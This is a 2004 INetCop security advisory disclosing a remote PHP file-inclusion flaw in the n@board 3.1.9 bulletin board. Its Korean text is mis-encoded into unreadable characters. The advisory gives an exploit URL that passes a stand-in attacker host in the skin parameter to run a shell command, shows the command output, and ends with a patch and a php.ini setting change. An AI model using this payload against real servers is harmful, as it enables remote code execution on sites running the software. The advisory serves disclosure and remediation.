======================================== INetCop Security Advisory #2004-0x82-025 ======================================== * Title: Naboard Remote PHP Injection exploit 0x01. Description PHP ÇÁ·Î±×·¡¹Ö Áß ÁÖÀÇÇØ¾ß ÇÒ °ÍÀÌ ¹Ù·Î PHP Injection Ãë¾àÁ¡ÀÔ´Ï´Ù. ´ëÇѹα¹ÀÇ ¸¹Àº °Ô½ÃÆÇ ¹× À¥ ¼Ö·ç¼ÇµéÀÌ ¹Ù·Î ÀÌ Ãë¾àÁ¡¿¡ ¹«·ÂÈ­µË´Ï´Ù. ÀúÈñ INetCop Security Team¿¡¼­´Â ´ÙÀ½°ú °°Àº naboard Ãë¾àÁ¡À» ¹ß°ßÇÏ¿´½À´Ï´Ù. skin/*/write.php ... ... ... $skin º¯¼ö´Â °ø°Ý targetÀÌ µÉ °ÍÀÔ´Ï´Ù. 0x02. Vulnerable Packages Vendor site: http://navyism.com/ n@board 3.1.9 (KOR) -naboard319.zip +Unix +Linux +Other n@board 3.1.9e (ENG) -naboard319english.zip n@board 3.1.9j (JPN) -naboard_jpn319.zip n@board 3.1.8cgb (CGB) -naboard318cgb.zip 0x03. Exploit ±×°ÍÀº ¸Å¿ì °£´ÜÇÏ°Ô exploit µÉ ¼ö ÀÖ½À´Ï´Ù. local ÆÄÀÏÀ» ºÒ·¯¿Ã ¼ö ÀÖÀ¸¸ç, ƯÁ¤ PHP ¹®¹ýÀ» ½ÇÇàÇÏ¿© ¹éµµ¾î·Î »ç¿ëµÉ ¼ö ÀÖ½À´Ï´Ù. ´ÙÀ½Àº ¿ø°Ý¿¡¼­ °ø°ÝÀ» ½ÃµµÇÏ´Â ¿¹Á¦ÀÔ´Ï´Ù. attacker_host¿¡ write_form.php ÆÄÀÏ À̸§À¸·Î ´ÙÀ½°ú °°Àº °ø°Ý ÆÄÀÏÀ» ÀÛ¼ºÇÑ ÈÄ, write_form.php: -- -- http://naboard_host/skin/mac_gray/write.php?skin=http://attacker_host/&cmd=id URL¿¡ Á¢¼ÓÇÏ¸é ´ÙÀ½°ú °°Àº °á°ú¸¦ ¾ò°Ô µÊ. °ø°Ý °á°ú: -- uid=99(nobody) gid=99(nobody) groups=99(nobody) Title Secret Memo Warning: Failed opening 'http://attacker_host//write_attach.php' for inclusion (include_path='.:/usr/local/lib/php') in /usr/local/apache/htdocs/naboard/skin/mac_gray/write.php on line 69 -- 0x04. Patch ¹®¹ýÀûÀ¸·Î ¸·À» ¼ö ÀÖ´Â ¹æ¹ýÀº ´ÙÀ½°ú °°½À´Ï´Ù. (¸ðµç ¹öÀü ÇØ´ç) skin/*/write.php: ... // patch core if(eregi(":\/\/",$skin)) { printf("\$skin error"); exit; } ... ±× ¹Û¿¡ ¼­¹ö ¼³Á¤¿¡¼­ PHP Injetcion Ãë¾àÁ¡À» Â÷´ÜÇÒ ¼ö ÀÖ½À´Ï´Ù. php.iniÀÇ ¼³Á¤ Áß, allow_url_fopen ¼³Á¤°ªÀ» 'On'¿¡¼­ 'Off'·Î ¼öÁ¤ÇØÁֹǷνá, ¿ø°Ý °ø°ÝÀÚÀÇ Ä§ÀÔÀ» ¸·À» ¼ö ÀÖ½À´Ï´Ù. -- °¨»çÇÕ´Ï´Ù. -- By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security. MSN & E-mail: szoahc(at)hotmail(dot)com, xploit(at)hackermail(dot)com INetCop Security Home: http://www.inetcop.org (Korean hacking game) My World: http://x82.inetcop.org GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y --